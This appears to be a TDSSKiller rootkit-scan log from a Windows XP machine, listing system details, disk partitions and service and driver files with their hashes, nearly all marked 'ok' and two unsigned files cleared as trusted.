13:13:54.0406 0x0780  Windows directory: C:\WINDOWS
13:13:54.0406 0x0780  System windows directory: C:\WINDOWS
13:13:54.0406 0x0780  Processor architecture: Intel x86
13:13:54.0406 0x0780  Number of processors: 2
13:13:54.0406 0x0780  Page size: 0x1000
13:13:54.0406 0x0780  Boot type: Normal boot
13:13:54.0406 0x0780  ============================================================
13:13:56.0734 0x0780  KLMD registered as C:\WINDOWS\system32\drivers\45884922.sys
13:13:56.0906 0x0780  System UUID: {10646453-9EAF-5A04-17E5-37A5C35426A9}
13:13:57.0796 0x0780  Drive \Device\Harddisk0\DR0 - Size: 0x2658AE0000 ( 153.39 Gb ), SectorSize: 0x200, Cylinders: 0x4E37, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000054
13:13:57.0812 0x0780  ============================================================
13:13:57.0812 0x0780  \Device\Harddisk0\DR0:
13:13:57.0828 0x0780  MBR partitions:
13:13:57.0828 0x0780  \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x9C263D, BlocksNum 0x8FADA22
13:13:57.0828 0x0780  \Device\Harddisk0\DR0\Partition2: MBR, Type 0xC, StartLBA 0x997005F, BlocksNum 0x90A8A62
13:13:57.0828 0x0780  ============================================================
13:13:57.0890 0x0780  C: <-> \Device\Harddisk0\DR0\Partition1
13:13:57.0890 0x0780  D: <-> \Device\Harddisk0\DR0\Partition2
13:13:57.0890 0x0780  ============================================================
13:13:57.0890 0x0780  Initialize success
13:13:57.0890 0x0780  ============================================================
13:15:40.0187 0x08d8  ============================================================
13:15:40.0187 0x08d8  Scan started
13:15:40.0187 0x08d8  Mode: Manual; SigCheck; TDLFS;
13:15:40.0187 0x08d8  ============================================================
13:15:40.0187 0x08d8  KSN ping started
13:15:42.0796 0x08d8  KSN ping finished: true
13:15:43.0984 0x08d8  ================ Scan system memory ========================
13:15:44.0000 0x08d8  System memory - ok
13:15:44.0000 0x08d8  ================ Scan services =============================
13:15:54.0296 0x08d8  ClipSrv - ok
13:15:54.0328 0x08d8  [ D87ACAED61E417BBA546CED5E7E36D9C, 14AC6034A5BC0FB2A1AFDAD42BEF4DE641556E54AD30D0C46765660A4BE55462 ] clr_optimization_v2.0.50727_32 C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
13:15:54.0343 0x08d8  clr_optimization_v2.0.50727_32 - ok
13:15:54.0406 0x08d8  [ C5A75EB48E2344ABDC162BDA79E16841, 6070A8AAFD38FBC6A68A2B10C20117612354DF21B4492D90CA522BFB6870D726 ] clr_optimization_v4.0.30319_32 C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
13:15:54.0421 0x08d8  clr_optimization_v4.0.30319_32 - ok
13:15:54.0437 0x08d8  CmdIde - ok
13:15:54.0453 0x08d8  COMSysApp - ok
13:15:54.0468 0x08d8  Cpqarray - ok
13:15:54.0500 0x08d8  [ 3D4E199942E29207970E04315D02AD3B, 0825960894CF9C86CC8775BDD2A262948A09CA495AA7FE9F210FAF49E7086383 ] CryptSvc        C:\WINDOWS\System32\cryptsvc.dll
13:15:54.0656 0x08d8  CryptSvc - ok
13:15:54.0671 0x08d8  dac2w2k - ok
13:15:54.0671 0x08d8  dac960nt - ok
13:15:54.0718 0x08d8  [ 6B27A5C03DFB94B4245739065431322C, 6AEAC16AB4E0DFD25123AAF4D4181FEE1B919B7B2793117006CE8CF30E826CFD ] DcomLaunch      C:\WINDOWS\system32\rpcss.dll
13:15:54.0812 0x08d8  DcomLaunch - ok
13:15:54.0843 0x08d8  [ 5E38D7684A49CACFB752B046357E0589, F192AD4190BCFB6939A5CBC91648FE63168AF79A5E227A111DEAD6A92E42AB8D ] Dhcp            C:\WINDOWS\System32\dhcpcsvc.dll
13:15:55.0015 0x08d8  Dhcp - ok
13:15:55.0046 0x08d8  [ 044452051F3E02E7963599FC8F4F3E25, 584BDDB074618BE76454CF90E74829CFF588B5B5FAEB793E2F7AAD26352DD689 ] Disk            C:\WINDOWS\system32\DRIVERS\disk.sys
13:15:55.0218 0x08d8  Disk - ok
13:15:55.0218 0x08d8  dmadmin - ok
13:15:55.0296 0x08d8  [ D992FE1274BDE0F84AD826ACAE022A41, C82BD6561A14F2932A761F5883A787B99031250EE5E9B7B5714AA045545C9B99 ] dmboot          C:\WINDOWS\system32\drivers\dmboot.sys
13:15:55.0468 0x08d8  dmboot - ok
13:15:55.0500 0x08d8  [ 7C824CF7BBDE77D95C08005717A95F6F, A73CB323B7A6410C3D3F258BF204E716ADF8C84C9E4F6562C57AB73DAED8CCDE ] dmio            C:\WINDOWS\system32\drivers\dmio.sys
13:15:55.0656 0x08d8  dmio - ok
13:15:55.0687 0x08d8  [ E9317282A63CA4D188C0DF5E09C6AC5F, D41E002F555FE9015EF620975255F58BB79198CA1FF0E09EC950CB450FF77CF7 ] dmload          C:\WINDOWS\system32\drivers\dmload.sys
13:15:55.0843 0x08d8  dmload - ok
13:15:55.0875 0x08d8  [ 57EDEC2E5F59F0335E92F35184BC8631, 61F6F0DC2D1A6C61D5EF0D5CC4BE0FFC217F1E61FDA3EA9F704709293656600F ] dmserver        C:\WINDOWS\System32\dmserver.dll
13:15:56.0031 0x08d8  dmserver - ok
13:15:56.0046 0x08d8  [ 8A208DFCF89792A484E76C40E5F50B45, 4E40E2EB38C6254E7CAA488200E89EE7DEBBBA773890BC6A84313CC68178D54F ] DMusic          C:\WINDOWS\system32\drivers\DMusic.sys
13:15:56.0187 0x08d8  DMusic - ok
13:15:56.0218 0x08d8  [ 5F7E24FA9EAB896051FFB87F840730D2, 356EEFDCD54DECAD0170B34B993E4BF80DD039E2B2922D7A8D09B84031E9FC7A ] Dnscache        C:\WINDOWS\System32\dnsrslvr.dll
13:15:56.0281 0x08d8  Dnscache - ok
13:15:56.0312 0x08d8  [ 0F0F6E687E5E15579EF4DA8DD6945814, 5C32D88119EB1465B2D719BEE2E05888D1A73454B5E33F2D4928DA710F8BFBA3 ] Dot3svc         C:\WINDOWS\System32\dot3svc.dll
13:15:56.0468 0x08d8  Dot3svc - ok
13:15:56.0468 0x08d8  dpti2o - ok
13:15:56.0500 0x08d8  [ 8F5FCFF8E8848AFAC920905FBD9D33C8, C8C6FB97AB0871C8C88A2201525A5CF10D5131CB6980D32692ED7A8F58399AD5 ] drmkaud         C:\WINDOWS\system32\drivers\drmkaud.sys
13:15:56.0656 0x08d8  drmkaud - ok
13:15:56.0671 0x08d8  [ 2187855A7703ADEF0CEF9EE4285182CC, 8233CC11F637866C0074043835A785EA2B616739B6B1181B143A253CF2508CFD ] EapHost         C:\WINDOWS\System32\eapsvc.dll
13:15:56.0843 0x08d8  EapHost - ok
13:15:56.0921 0x08d8  [ FCE87BA643D5E9A8B6E0378508D1B22D, 45B278A763FB183B2B29AF2D2B9D790BA97A800644942AE4AFBBDCF2864B5AB2 ] eeCtrl          C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys
13:15:56.0968 0x08d8  eeCtrl - ok
13:15:57.0000 0x08d8  [ BC93B4A066477954555966D77FEC9ECB, 27F5B780175EF46DA102EE33F7F33559C8B40C077EEA4405D579D9507F4B1C23 ] ERSvc           C:\WINDOWS\System32\ersvc.dll
13:15:57.0156 0x08d8  ERSvc - ok
13:15:57.0203 0x08d8  [ 65DF52F5B8B6E9BBD183505225C37315, 59C606977DB40A3443DFF0BE2A4C761824881B22C9FDB3D23F6486DB580E92A4 ] Eventlog        C:\WINDOWS\system32\services.exe
13:15:57.0250 0x08d8  Eventlog - ok
13:15:57.0296 0x08d8  [ D4991D98F2DB73C60D042F1AEF79EFAE, 58AF949EAEBF4FF3E3314DFB66CE4198BF65F0836B68CD27A6ED319742CCCCD2 ] EventSystem     C:\WINDOWS\system32\es.dll
13:15:57.0359 0x08d8  EventSystem - ok
13:15:57.0375 0x08d8  [ 38D332A6D56AF32635675F132548343E, E6909DB836AF679B4F4D62C7396D6C82769CC7ABB8C919C2AABFE934FCE268F6 ] Fastfat         C:\WINDOWS\system32\drivers\Fastfat.sys
13:15:57.0531 0x08d8  Fastfat - ok
13:15:57.0562 0x08d8  [ 99BC0B50F511924348BE19C7C7313BBF, A1006C687BD352F700B140DC741515A0CDD9E1352C0FBD1EE410D404E344444B ] FastUserSwitchingCompatibility C:\WINDOWS\System32\shsvcs.dll
13:15:57.0609 0x08d8  FastUserSwitchingCompatibility - ok
13:15:57.0656 0x08d8  [ E97D6A8684466DF94FF3BC24FB787A07, 89E5A6889E3C5AB9AD3E80FFC16DD608278F3ADC282048B40B60196336A5CBEB ] Fax             C:\WINDOWS\system32\fxssvc.exe
13:15:57.0843 0x08d8  Fax - ok
13:15:57.0875 0x08d8  [ 92CDD60B6730B9F50F6A1A0C1F8CDC81, 8307A532AB4D05CBBCE206DC2759497708BF5AAA880BD00F0E4F281D8578A1F5 ] Fdc             C:\WINDOWS\system32\DRIVERS\fdc.sys
13:15:58.0015 0x08d8  Fdc - ok
13:15:58.0046 0x08d8  [ D45926117EB9FA946A6AF572FBE1CAA3, 4C94EF009D778BE0BDF8F812F026B96F91F641BE30AA2531427A5E63DBD280DA ] Fips            C:\WINDOWS\system32\drivers\Fips.sys
13:15:58.0203 0x08d8  Fips - ok
13:15:58.0218 0x08d8  [ 9D27E7B80BFCDF1CDD9B555862D5E7F0, 69C271AD5BCEBFD8AE5A769BDD7EC51256DA3A8ADAD5D12E5C0D13F4E82D8805 ] Flpydisk        C:\WINDOWS\system32\DRIVERS\flpydisk.sys
13:15:58.0375 0x08d8  Flpydisk - ok
13:15:58.0406 0x08d8  [ B2CF4B0786F8212CB92ED2B50C6DB6B0, 280F5CF8A90F7BEDE73ADD0DD0F8952088133A7CA9A3D3B7041957E33B36845D ] FltMgr          C:\WINDOWS\system32\drivers\fltmgr.sys
13:15:58.0578 0x08d8  FltMgr - ok
13:15:58.0640 0x08d8  [ 8BA7C024070F2B7FDD98ED8A4BA41789, 47585006F86B2C6016EC54250A416794792D1E4024FF229C120BC25B684AF66A ] FontCache3.0.0.0 C:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
13:15:58.0656 0x08d8  FontCache3.0.0.0 - ok
13:15:58.0687 0x08d8  [ 3E1E2BD4F39B0E2B7DC4F4D2BCC2779A, EC635E071201A766845D48973772CBE0958942B4162F3F5F70660D114CC877E0 ] Fs_Rec          C:\WINDOWS\system32\drivers\Fs_Rec.sys
13:15:58.0828 0x08d8  Fs_Rec - ok
13:15:58.0859 0x08d8  [ 6AC26732762483366C3969C9E4D2259D, FF2C9A23CC17F380093F0BEA955B1925794271C2FEA16B9B7639668E6999BAE3 ] Ftdisk          C:\WINDOWS\system32\DRIVERS\ftdisk.sys
13:15:59.0031 0x08d8  Ftdisk - ok
13:15:59.0062 0x08d8  [ 185ADA973B5020655CEE342059A86CBB, D3E352DFAF30761505480A4C557D980083F65EC5BD46E2656B2114D47B272A89 ] GEARAspiWDM     C:\WINDOWS\system32\Drivers\GEARAspiWDM.sys
13:15:59.0078 0x08d8  GEARAspiWDM - ok
13:15:59.0109 0x08d8  [ 0A02C63C8B144BD8C86B103DEE7C86A2, 7A3235DD3E1995DD72B212FAEB3ECA2A974434DE9BF6D269EA11BA65A80E7E50 ] Gpc             C:\WINDOWS\system32\DRIVERS\msgpc.sys
13:15:59.0265 0x08d8  Gpc - ok
13:15:59.0343 0x08d8  [ 506708142BC63DABA64F2D3AD1DCD5BF, 9C36A08D9E7932FF4DA7B5F24E6B42C92F28685B8ABE964C870E8D7670FD531A ] gupdate         C:\Program Files\Google\Update\GoogleUpdate.exe
13:15:59.0375 0x08d8  gupdate - ok
13:15:59.0375 0x08d8  [ 506708142BC63DABA64F2D3AD1DCD5BF, 9C36A08D9E7932FF4DA7B5F24E6B42C92F28685B8ABE964C870E8D7670FD531A ] gupdatem        C:\Program Files\Google\Update\GoogleUpdate.exe
13:15:59.0390 0x08d8  gupdatem - ok
13:15:59.0421 0x08d8  [ 573C7D0A32852B48F3058CFD8026F511, BC384BBA394AFDCDA1A9ABC858C692AA84A1F0A31AF3DDF7F38D120C027927FB ] HDAudBus        C:\WINDOWS\system32\DRIVERS\HDAudBus.sys
13:15:59.0578 0x08d8  HDAudBus - ok
13:15:59.0625 0x08d8  [ 4FCCA060DFE0C51A09DD5C3843888BCD, D82417706B517F2610DDF7C86BE03A72EFA9A2A389DF5C8F8ADEAB8144E2C80A ] helpsvc         C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll
13:15:59.0796 0x08d8  helpsvc - ok
13:15:59.0812 0x08d8  [ DEB04DA35CC871B6D309B77E1443C796, F66A15C9528D661940F1F4CA453B3E95036D68C74C3B8AB53644211DBD3D2F32 ] HidServ         C:\WINDOWS\System32\hidserv.dll
13:15:59.0984 0x08d8  HidServ - ok
13:16:00.0015 0x08d8  [ CCF82C5EC8A7326C3066DE870C06DAF1, 93395FA4C26B2E82DC8B7025ED3BCF583885E5D8C5F60CD6EEAA6335D6A126EC ] hidusb          C:\WINDOWS\system32\DRIVERS\hidusb.sys
13:16:00.0171 0x08d8  hidusb - ok
13:16:00.0218 0x08d8  [ 8878BD685E490239777BFE51320B88E9, C5C3ECF6B049B6736E35B39518A8F830B45C45A88FFE8E3A6B7922AD946597E2 ] hkmsvc          C:\WINDOWS\System32\kmsvc.dll
13:16:00.0359 0x08d8  hkmsvc - ok
13:16:00.0375 0x08d8  hpn - ok
13:16:00.0468 0x08d8  [ 5DA42D24712E00728CEA2342A65009B2, 73EC5250DCFD556525B24B3CA66C64AC7747E77652A2AD6119936A59A9E8562A ] hpqcxs08        C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll
13:16:00.0484 0x08d8  hpqcxs08 - ok
13:16:00.0546 0x08d8  [ D86A39BF100069444D026D22D9A6E555, 7B24D48D5BA67704C88697FADB64364E0E64D26259408E3C219820C5404C5EEC ] hpqddsvc        C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll
13:16:00.0562 0x08d8  hpqddsvc - ok
13:16:00.0593 0x08d8  [ A04F4AC48895774A2CF9D1C9EAAACEF0, 012F10DE086C3551D75716EF1F6DCC477C8C1E776267D9FC4073BEADAFD37C9C ] HPSLPSVC        C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL
13:16:00.0640 0x08d8  HPSLPSVC - ok
13:16:00.0687 0x08d8  [ D03D10F7DED688FECF50F8FBF1EA9B8A, C19A733571BA831E24EE45EDB730FFFDBA22638F138A32A794BEAB8D8B71D8DD ] HPZid412        C:\WINDOWS\system32\DRIVERS\HPZid412.sys
13:16:00.0859 0x08d8  HPZid412 - ok
13:16:00.0906 0x08d8  [ 89F41658929393487B6B7D13C8528CE3, 5D06A11225A83F3F33417148BE53654080C88BFA876FEB486A7E43410AC99F23 ] HPZipr12        C:\WINDOWS\system32\DRIVERS\HPZipr12.sys
13:16:00.0953 0x08d8  HPZipr12 - ok
13:16:00.0984 0x08d8  [ ABCB05CCDBF03000354B9553820E39F8, 6361B5A57CDE23AC5E987ACECF3BEE7AD51134C6E5BF4F833E512C9BC4B86877 ] HPZius12        C:\WINDOWS\system32\DRIVERS\HPZius12.sys
13:16:01.0359 0x08d8  HPZius12 - ok
13:16:01.0406 0x08d8  [ F80A415EF82CD06FFAF0D971528EAD38, 524D9E9201572929522F6805011783711B7C0F76308B924C89CF75F4B7A1FDF3 ] HTTP            C:\WINDOWS\system32\Drivers\HTTP.sys
13:16:01.0453 0x08d8  HTTP - ok
13:16:01.0484 0x08d8  [ 6100A808600F44D999CEBDEF8841C7A3, 61A75118C327812C60622010985A2E80E79B6FD9030A5732390EE5426E4AF6C9 ] HTTPFilter      C:\WINDOWS\System32\w3ssl.dll
13:16:01.0625 0x08d8  HTTPFilter - ok
13:16:01.0625 0x08d8  i2omp - ok
13:16:01.0656 0x08d8  [ 4A0B06AA8943C1E332520F7440C0AA30, DB2452390CCFE67E0C5FEB4FD42CA24ABE2DDD40D0B22DD5F5B8F70416863918 ] i8042prt        C:\WINDOWS\system32\DRIVERS\i8042prt.sys
13:16:01.0796 0x08d8  i8042prt - ok
13:16:01.0859 0x08d8  [ 88164BA0E3FC4172FF3A1BD82B756454, 678A6C5FD8254993D5ACDECAB24EF84E8C00875E8E310CA962EEB993C573906D ] ialm            C:\WINDOWS\system32\DRIVERS\igxpmp32.sys
13:16:01.0937 0x08d8  ialm - ok
13:16:01.0984 0x08d8  [ 6F95324909B502E2651442C1548AB12F, FF1B104990FE186C6100ED229A45345FF695323AC778688EC11AA8F5A87B141E ] IDriverT        C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
13:16:02.0000 0x08d8  IDriverT - detected UnsignedFile.Multi.Generic ( 1 )
13:16:04.0812 0x08d8  Detect skipped due to KSN trusted
13:16:04.0812 0x08d8  IDriverT - ok
13:16:04.0890 0x08d8  [ C01AC32DC5C03076CFB852CB5DA5229C, A4D7749220B5BC965D96A267F1E02FE8284A230BA249109207BD4B9EA8DFAC96 ] idsvc           C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
13:16:04.0953 0x08d8  idsvc - ok
13:16:04.0968 0x08d8  [ 083A052659F5310DD8B6A6CB05EDCF8E, 48D39B03FFB6FAA1529B774443BA12618AE3982D9F65A7B9D18F2269F78B31F4 ] Imapi           C:\WINDOWS\system32\DRIVERS\imapi.sys
13:16:05.0140 0x08d8  Imapi - ok
13:16:05.0187 0x08d8  [ 30DEAF54A9755BB8546168CFE8A6B5E1, 3936228CD3125C763ABFCB93E86E4B43838202BCC0913A28E84AC0263B43EE0D ] ImapiService    C:\WINDOWS\system32\imapi.exe
13:16:05.0343 0x08d8  ImapiService - ok
13:16:05.0359 0x08d8  ini910u - ok
13:16:05.0562 0x08d8  [ FA9A9468F982835E99C1EC21257F7E60, 0A31307CDF8833FD9378B297F6860B36AF5FB535816145AAC8B9C907AECF4B17 ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RtkHDAud.sys
13:16:05.0812 0x08d8  IntcAzAudAddService - ok
13:16:05.0859 0x08d8  [ 8C953733D8F36EB2133F5BB58808B66B, 555868F246D73652E998B0B1296476E42FCEDED30D646CC000F31ECE4EBC25E6 ] intelppm        C:\WINDOWS\system32\DRIVERS\intelppm.sys
13:16:06.0000 0x08d8  intelppm - ok
13:16:06.0078 0x08d8  [ 1663A135865F0BA6E853353E98E67F2A, 700D383F964EBF38D9B66A6C7966700F0DBE7C7AF77AAE2F67AF703E36C8116B ] IntuitUpdateServiceV4 C:\Program Files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
13:16:06.0093 0x08d8  IntuitUpdateServiceV4 - ok
13:16:06.0125 0x08d8  [ 3BB22519A194418D5FEC05D800A19AD0, F6662F440950596DC1382DD1DB5D7891CCEA30A6062BEA942C18445B5F0D8B16 ] Ip6Fw           C:\WINDOWS\system32\drivers\ip6fw.sys
13:16:06.0281 0x08d8  Ip6Fw - ok
13:16:06.0312 0x08d8  [ 731F22BA402EE4B62748ADAF6363C182, 5C3BEBD008A5BE4DC2F92076FF41A10DDC01E10EC7E6552213CFA11970811848 ] IpFilterDriver  C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
13:16:06.0468 0x08d8  IpFilterDriver - ok
13:16:06.0500 0x08d8  [ B87AB476DCF76E72010632B5550955F5, E6E74D3A86A7917A8BAED44F8E97CCD2EB171E4E4B27E9907F60D1523FAF319A ] IpInIp          C:\WINDOWS\system32\DRIVERS\ipinip.sys
13:16:06.0625 0x08d8  IpInIp - ok
13:16:06.0656 0x08d8  [ CC748EA12C6EFFDE940EE98098BF96BB, AF523E21C25D9A1715EFEA573E4F52AF5D4FC9F28A2D613F5DB629C186C439E0 ] IpNat           C:\WINDOWS\system32\DRIVERS\ipnat.sys
13:16:06.0796 0x08d8  IpNat - ok
13:16:06.0875 0x08d8  [ BC0EA61246F8D940FBC5F652D337D6BD, BF018317631937EED13136608831F526BE34AF7E59FEF4863E3EDD205C02E1A7 ] iPod Service    C:\Program Files\iPod\bin\iPodService.exe
13:16:06.0921 0x08d8  iPod Service - ok
13:16:06.0937 0x08d8  [ 23C74D75E36E7158768DD63D92789A91, 394D296F38E7D8EFD91A6EEC301D9CE6AF910E35EB9819F1A9E3363863AEDFDC ] IPSec           C:\WINDOWS\system32\DRIVERS\ipsec.sys
13:16:07.0093 0x08d8  IPSec - ok
13:16:07.0109 0x08d8  [ C93C9FF7B04D772627A3646D89F7BF89, 805FA48E7A46D4F10240BF880A2468F53DEA36E83004399228AB70DB7D20544A ] IRENUM          C:\WINDOWS\system32\DRIVERS\irenum.sys
13:16:07.0250 0x08d8  IRENUM - ok
13:16:07.0265 0x08d8  [ 05A299EC56E52649B1CF2FC52D20F2D7, 2654619DB3E6D6C385B63AB02F87D4241C4F0250CC31383D1B3586917166C2DC ] isapnp          C:\WINDOWS\system32\DRIVERS\isapnp.sys
13:16:07.0421 0x08d8  isapnp - ok
13:16:07.0531 0x08d8  [ 9ECF00E19736054E019C532AED8228FC, F5A64A8269EA3655BBD4850298F335C0BD30535258928ED7CE62A32A3363E60B ] JavaQuickStarterService C:\Program Files\Java\jre7\bin\jqs.exe
13:16:07.0546 0x08d8  JavaQuickStarterService - ok
13:16:07.0562 0x08d8  [ 463C1EC80CD17420A542B7F36A36F128, E3B11BA26AFEAFB50B0FC168EA07F6049DA6B88BCDDEEE20310602D7FC27A3A7 ] Kbdclass        C:\WINDOWS\system32\DRIVERS\kbdclass.sys
13:16:07.0703 0x08d8  Kbdclass - ok
13:16:07.0734 0x08d8  [ 692BCF44383D056AED41B045A323D378, 1A99DEE83FFAF64E73067FC049C0A4CE07D94E4AE31EFA17B38CEFA9E41D67DC ] kmixer          C:\WINDOWS\system32\drivers\kmixer.sys
13:16:07.0921 0x08d8  kmixer - ok
13:16:07.0937 0x08d8  [ B467646C54CC746128904E1654C750C1, 3BD71BE3663EA23463D236D8A2A2E42DFA10C502BDB4B6E131FAF0FBA748219E ] KSecDD          C:\WINDOWS\system32\drivers\KSecDD.sys
13:16:08.0031 0x08d8  KSecDD - ok
13:16:08.0062 0x08d8  [ 3A7C3CBE5D96B8AE96CE81F0B22FB527, 0044F03132596A494448CCE5F3D6ECC12617BB4CF6BAE348F79D4DC40ACD6EE0 ] lanmanserver    C:\WINDOWS\System32\srvsvc.dll
13:16:08.0125 0x08d8  lanmanserver - ok
13:16:08.0156 0x08d8  [ A8888A5327621856C0CEC4E385F69309, B08B63300D824E35E31EEEA2C4C086DFA2C2A964CEDAE512E74D3D88AADAA2C1 ] lanmanworkstation C:\WINDOWS\System32\wkssvc.dll
13:16:08.0203 0x08d8  lanmanworkstation - ok
13:16:08.0234 0x08d8  [ A7DB739AE99A796D91580147E919CC59, EDF4E039BA277B0E6D66FEB0B28096E67D682C09DFC18ECECF062D9DCFB75ACF ] LmHosts         C:\WINDOWS\System32\lmhsvc.dll
13:16:08.0406 0x08d8  LmHosts - ok
13:16:08.0421 0x08d8  [ 986B1FF5814366D71E0AC5755C88F2D3, E6AF051174531C24B38E73987755D366ABEC595476C6D17793E8DCCC73F55340 ] Messenger       C:\WINDOWS\System32\msgsvc.dll
13:16:08.0546 0x08d8  Messenger - ok
13:16:08.0562 0x08d8  [ 4AE068242760A1FB6E1A44BF4E16AFA6, 1FB771162B96AAF787AC24867B818DF8511F0780BB094FA9A38C11D8DBFE68BC ] mnmdd           C:\WINDOWS\system32\drivers\mnmdd.sys
13:16:08.0703 0x08d8  mnmdd - ok
13:16:08.0734 0x08d8  [ D18F1F0C101D06A1C1ADF26EED16FCDD, BA0837C7780BD8262E143E2935AFA63BE59C3C39EF56CB8608EED0F50AF070D4 ] mnmsrvc         C:\WINDOWS\system32\mnmsrvc.exe
13:16:08.0890 0x08d8  mnmsrvc - ok
13:16:08.0906 0x08d8  [ DFCBAD3CEC1C5F964962AE10E0BCC8E1, B342CC9EC3729AB1AB4B5E2E99F890C1E0CA649162DE91F6768AB857B719E97B ] Modem           C:\WINDOWS\system32\drivers\Modem.sys
13:16:09.0031 0x08d8  Modem - ok
13:16:09.0062 0x08d8  [ 35C9E97194C8CFB8430125F8DBC34D04, 0C0FCE6B0A23FB0ECB92E1663E1C72D2DD5B177D82E04782957690B69530DB39 ] Mouclass        C:\WINDOWS\system32\DRIVERS\mouclass.sys
13:16:09.0187 0x08d8  Mouclass - ok
13:16:09.0218 0x08d8  [ B1C303E17FB9D46E87A98E4BA6769685, 161A45488522055D0F0474ABEDA04DDD0B5DAC2411AF9154B15190BBD66E7153 ] mouhid          C:\WINDOWS\system32\DRIVERS\mouhid.sys
13:16:09.0359 0x08d8  mouhid - ok
13:16:09.0375 0x08d8  [ A80B9A0BAD1B73637DBCBBA7DF72D3FD, 2A5E15ED2C24C6C65EF2F7E1FD93374774076C9D8D451E4422561F4D269C012F ] MountMgr        C:\WINDOWS\system32\drivers\MountMgr.sys
13:16:09.0515 0x08d8  MountMgr - ok
13:16:09.0562 0x08d8  [ FD5E45969B82B83E33CB05B5C9B0E3F2, A6C21F7A0A97683DA50FC102131618CC1BE5CA0C3625D2FDAF5861B9B6523E45 ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
13:16:09.0593 0x08d8  MozillaMaintenance - detected UnsignedFile.Multi.Generic ( 1 )
13:16:12.0390 0x08d8  Detect skipped due to KSN trusted
13:16:12.0390 0x08d8  MozillaMaintenance - ok
13:16:12.0406 0x08d8  mraid35x - ok
13:16:12.0531 0x08d8  [ 11D42BB6206F33FBB3BA0288D3EF81BD, 76ABCFB62C5AC549F58C231F72A99882CDEB74928104B77FE52554765C2B1A22 ] MRxDAV          C:\WINDOWS\system32\DRIVERS\mrxdav.sys
13:16:12.0703 0x08d8  MRxDAV - ok
13:16:12.0750 0x08d8  [ A137F1470499A205ABBB9AAFB3B6F2B1, FB4951727543030D9E6ED74149C3FAACE2CA9DA8C1B5F616301B30B858C724E8 ] MSDTC           C:\WINDOWS\system32\msdtc.exe
13:16:12.0921 0x08d8  MSDTC - ok
13:16:13.0000 0x08d8  [ C941EA2454BA8350021D774DAF0F1027, C940E978C7B66A713A0FDAB54B5F995DF59D089AFCD96221DD3222948CD49BBD ] Msfs            C:\WINDOWS\system32\drivers\Msfs.sys
13:16:13.0156 0x08d8  Msfs - ok
13:16:13.0171 0x08d8  MSIServer - ok
13:16:13.0203 0x08d8  [ D1575E71568F4D9E14CA56B7B0453BF1, 4ABE0E24786C0D39FA2B885447E56204CA6942FB175E534DCE675D7BCF0B176A ] MSKSSRV         C:\WINDOWS\system32\drivers\MSKSSRV.sys
13:16:13.0359 0x08d8  MSKSSRV - ok
13:16:13.0375 0x08d8  [ 325BB26842FC7CCC1FCCE2C457317F3E, C07BE560513B1FB91D756494F0BA4AEEB2E1998DE0E1C21EE83DB1183B0CEE91 ] MSPCLOCK        C:\WINDOWS\system32\drivers\MSPCLOCK.sys
13:16:13.0531 0x08d8  MSPCLOCK - ok
13:16:13.0546 0x08d8  [ BAD59648BA099DA4A17680B39730CB3D, 9AD4C7C94C186C8815D0BC75DCAFB962158DA6935A244BA243EDDDEB33F9816C ] MSPQM           C:\WINDOWS\system32\drivers\MSPQM.sys
13:16:13.0734 0x08d8  MSPQM - ok
13:16:13.0812 0x08d8  [ AF5F4F3F14A8EA2C26DE30F7A1E17136, AC93A1E4ABB0D038B772E429015567E44CC2EDB66C54DBE23A5F98176FAC1520 ] mssmbios        C:\WINDOWS\system32\DRIVERS\mssmbios.sys
13:16:13.0968 0x08d8  mssmbios - ok
13:16:14.0015 0x08d8  [ DE6A75F5C270E756C5508D94B6CF68F5, FCC972DDC36C2C44D836913F10004C2C33B11C54DEFFF0C63E0FDF901D2F9261 ] Mup             C:\WINDOWS\system32\drivers\Mup.sys
13:16:14.0109 0x08d8  Mup - ok
13:16:14.0437 0x08d8  [ 0102140028FAD045756796E1C685D695, 5335B8278418CA200E2772124F0602C3E15A5CAF2D5CC59F6785DFAABF339B09 ] napagent        C:\WINDOWS\System32\qagentrt.dll
13:16:14.0640 0x08d8  napagent - ok
13:16:14.0703 0x08d8  [ 1DF7F42665C94B825322FAE71721130D, FE0DCB728471465B39A42A7511F4133021FBA5DF88F88BCB5FE2FF34CFD713F9 ] NDIS            C:\WINDOWS\system32\drivers\NDIS.sys
13:16:14.0859 0x08d8  NDIS - ok
13:16:14.0921 0x08d8  [ 0109C4F3850DFBAB279542515386AE22, 4F6DB1E499AC853FD36FD603FBB6D3AC9BDCEB298C7FE1FB59A9236CB46729B2 ] NdisTapi        C:\WINDOWS\system32\DRIVERS\ndistapi.sys
13:16:14.0968 0x08d8  NdisTapi - ok
13:16:15.0015 0x08d8  [ F927A4434C5028758A842943EF1A3849, B1AA3AF150C05307461774925901789456B0CCCD03A5E71ADA4AB58455962BEE ] Ndisuio         C:\WINDOWS\system32\DRIVERS\ndisuio.sys
13:16:15.0156 0x08d8  Ndisuio - ok
13:16:15.0171 0x08d8  [ EDC1531A49C80614B2CFDA43CA8659AB, 494042F790F33721328B4451E79842E21919681CC421A4F9633EC4D383E06097 ] NdisWan         C:\WINDOWS\system32\DRIVERS\ndiswan.sys
13:16:15.0328 0x08d8  NdisWan - ok
13:16:15.0343 0x08d8  [ 2F597BB467E05B1FE3830EABD821B8E0, 141497F5A49D47CCE3C9289644F4BD838DCB238F6D8E847FC006652E21FE02AC ] NDProxy         C:\WINDOWS\system32\drivers\NDProxy.sys
13:16:15.0375 0x08d8  NDProxy - ok
